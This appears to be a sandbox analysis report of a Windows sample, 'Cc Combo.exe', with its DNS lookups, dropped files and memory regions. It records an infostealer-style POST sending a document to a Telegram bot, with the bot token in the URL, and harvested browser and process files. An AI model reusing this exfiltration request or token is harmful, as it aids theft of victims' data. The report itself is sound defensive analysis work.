      tls, http
      Cc Combo.exe
      86.9kB
      7.8kB
      73
      38

      HTTP Request

      POST https://api.telegram.org/bot1784055443:AAG-bXLYtnFpjJ_L3ogxA3bq6Mx09cqh8ug/sendDocument?chat_id=1937717367

      HTTP Response

      401
    • 127.0.0.1:8808
      Cc Combo.exe
    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
      90 B
      1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    • 8.8.8.8:53
      154.239.44.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      154.239.44.20.in-addr.arpa

    • 8.8.8.8:53
      172.214.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.214.232.199.in-addr.arpa

    • 8.8.8.8:53
      0.181.190.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      0.181.190.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      icanhazip.com
      dns
      Cc Combo.exe
      59 B
      91 B
      1
      1

      DNS Request

      icanhazip.com

      DNS Response

      104.16.185.241
      104.16.184.241

    • 8.8.8.8:53
      api.mylnikov.org
      dns
      Cc Combo.exe
      62 B
      94 B
      1
      1

      DNS Request

      api.mylnikov.org

      DNS Response

      172.67.196.114
      104.21.44.66

    • 8.8.8.8:53
      241.185.16.104.in-addr.arpa
      dns
      73 B
      135 B
      1
      1

      DNS Request

      241.185.16.104.in-addr.arpa

    • 8.8.8.8:53
      api.telegram.org
      dns
      Cc Combo.exe
      62 B
      78 B
      1
      1

      DNS Request

      api.telegram.org

      DNS Response

      149.154.167.220

    • 8.8.8.8:53
      114.196.67.172.in-addr.arpa
      dns
      73 B
      135 B
      1
      1

      DNS Request

      114.196.67.172.in-addr.arpa

    • 8.8.8.8:53
      220.167.154.149.in-addr.arpa
      dns
      74 B
      167 B
      1
      1

      DNS Request

      220.167.154.149.in-addr.arpa

    • 8.8.8.8:53
      google.com
      dns
      Cc Combo.exe
      56 B
      72 B
      1
      1

      DNS Request

      google.com

      DNS Response

      172.217.169.14

    • 8.8.8.8:53
      26.165.165.52.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      26.165.165.52.in-addr.arpa

    • 8.8.8.8:53
      206.23.85.13.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      206.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      107.12.20.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      107.12.20.2.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\23684b8162b569f9c1bb36f1794167ce\msgid.dat

      Filesize

      3B

      MD5

      16a5cdae362b8d27a1d8f8c7b78b4330

      SHA1

      7edab1f00ca6b31e11f7eb2e61787ed747420923

      SHA256

      00328ce57bbc14b33bd6695bc8eb32cdf2fb5f3a7d89ec14a42825e15d39df60

      SHA512

      5085434c76cfd5687ea141f067922d9ba2e5690e712b0686678f2c61a90306edad1038c73d84b0bdc93159c2eedd508abc790c156b83b1255cb4b034da8bb09a

    • C:\Users\Admin\AppData\Local\9a7d8ba08df952c93e9cf5f3b54e1a84\Admin@SYMRKCCU_en-US\Browsers\Firefox\Bookmarks.txt

      Filesize

      105B

      MD5

      2e9d094dda5cdc3ce6519f75943a4ff4

      SHA1

      5d989b4ac8b699781681fe75ed9ef98191a5096c

      SHA256

      c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

      SHA512

      d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

    • C:\Users\Admin\AppData\Local\9a7d8ba08df952c93e9cf5f3b54e1a84\Admin@SYMRKCCU_en-US\System\Process.txt

      Filesize

      4KB

      MD5

      d05fe6bef9a1b11c6bef3049843cfba5

      SHA1

      97183a14b14c4baddc87fe9aac8415942f06e8f3

      SHA256

      07f5f8a705991c2018bf01c50c1d8b83d9869a9332901609f1a4ddc37a546acd

      SHA512

      a1cf5bd3e9c23de61e501ed119f0e845f2517d97fa75887612bde7f5f5639a8c531c1eee182a98a7c73f18e3d42ba0b6e1e52103779aad67b46d1997a9713732

    • memory/5368-4-0x0000000005D80000-0x0000000006324000-memory.dmp

      Filesize

      5.6MB

    • memory/5368-0-0x000000007524E000-0x000000007524F000-memory.dmp

      Filesize

      4KB

    • memory/5368-5-0x00000000058B0000-0x0000000005942000-memory.dmp

      Filesize

      584KB

    • memory/5368-3-0x0000000075240000-0x00000000759F0000-memory.dmp

      Filesize

      7.7MB

    • memory/5368-2-0x0000000004F20000-0x0000000004F86000-memory.dmp

      Filesize

      408KB

    • memory/5368-145-0x000000007524E000-0x000000007524F000-memory.dmp

      Filesize

      4KB

    • memory/5368-155-0x0000000075240000-0x00000000759F0000-memory.dmp

      Filesize

      7.7MB

    • memory/5368-156-0x0000000075240000-0x00000000759F0000-memory.dmp

      Filesize

      7.7MB

    • memory/5368-161-0x0000000006640000-0x000000000664A000-memory.dmp

      Filesize

      40KB

    • memory/5368-1-0x0000000000520000-0x0000000000560000-memory.dmp

      Filesize

      256KB

    • memory/5368-167-0x0000000006D30000-0x0000000006D42000-memory.dmp

      Filesize

      72KB

    • memory/5368-192-0x0000000075240000-0x00000000759F0000-memory.dmp

      Filesize

      7.7MB

    • memory/5368-193-0x00000000078F0000-0x00000000078FA000-memory.dmp

      Filesize

      40KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.